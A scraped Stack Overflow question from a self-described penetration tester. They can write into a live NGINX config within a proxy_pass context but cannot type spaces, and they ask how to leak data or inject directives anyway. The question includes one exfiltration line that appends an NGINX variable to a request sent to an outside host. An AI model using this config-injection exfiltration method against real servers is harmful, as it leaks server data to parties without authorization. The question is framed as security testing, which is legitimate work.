'NGINX Config File Without Space Character

Got a quick question for your NGINX wizards out there. I'm a penetration tester and I've got a a vulnerability where I can write into a live NGINX config file and then NGINX reloads. However, I cannot write the " " character. Any idea how I can do something? I'm injecting into a proxypass context. I can leak the contents of some variables using proxypass https://myhost.com?$request_id to leak the request I'd, but all characters are lower cased so I can't get upper case variables. Any suggestions on how to leak anything of impact or write a directive without using a space?

nginxnginx-reverse-proxy


Sources

This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.

Source: Stack Overflow

Solution Source

Related Questions

Nginx getting the event "ngx_master_****" was not signaled for 5s

Valid characters in nginx upstream name

Nginx proxy_pass with $remote_addr

Nginx the event was not signaled for 5s

how to serve static files through nginx and django in windows

The Streamlit app stops with "Please wait... " and then stops

The Streamlit app stops with "Please wait... " and then stops

Express and nginx net::ERR_CONTENT_LENGTH_MISMATCH

Express and nginx net::ERR_CONTENT_LENGTH_MISMATCH

Locate the nginx.conf file my nginx is actually using

Angular SPA with Custom --base-href and Nginx Routing

What does "trust proxy" actually do in express.js, and do I need to use it?

Nginx ingress controller not giving metrics for prometheus

(13: Permission denied) while connecting to upstream:[nginx]

Ubuntu Nginx/Laravel 500 Internal Server Error